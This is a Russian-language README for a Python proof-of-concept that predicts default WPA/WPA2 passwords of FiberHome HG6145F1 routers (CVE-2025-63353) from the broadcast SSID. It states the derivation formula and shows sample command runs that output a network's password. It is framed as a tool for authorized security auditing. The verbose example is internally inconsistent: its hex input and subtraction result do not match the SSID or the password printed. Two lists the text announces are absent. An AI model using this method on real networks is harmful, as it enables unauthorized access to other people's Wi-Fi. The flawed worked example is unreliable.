
CVE-2025-63353
Утилита на Python, предназначенная для аудита безопасности и демонстрации концепции (proof-of-concept) уязвимости детерминированной генерации паролей, обнаруженной в маршрутизаторах FiberHome HG6145F1 (RP4423).
Этот скрипт эксплуатирует CVE-2025-63353 — критическую уязвимость, в которой заводской предварительный ключ WPA/WPA2 математически выводится из транслируемого SSID. Наблюдая имя сети (SSID), злоумышленник может вычислить пароль по умолчанию без какого-либо взаимодействия с пользователем.
Логика уязвимости: Маршрутизатор использует детерминированную формулу: HEX_A (из SSID) + HEX_B (из пароля) = 0xFFFFFF.
Оборудование FiberHome широко развернуто крупными интернет-провайдерами (ISP) на развивающихся рынках. Данный скрипт эффективен против устройств со следующими соглашениями об именовании по умолчанию:
Скрипт использует argparse для обработки аргументов командной строки.
python predictor.py fh_96C3A0
[+] Predicted Password: wlan693c5f
Use the -v flag to see the underlying hexadecimal subtraction.
python predictor.py fh_96C3A0 -v
[*] Input HEX_A: 0x669EA0
[*] Calculation: 0xFFFFFF - 0x669EA0 = 0x99615F
[+] Predicted Password: wlan693c5f
Если ваш маршрутизатор уязвим, ваша сеть небезопасна, пока вы не примете меры:
Эта информация предоставлена для авторизованного тестирования безопасности, администрирования сетей и образовательных целей.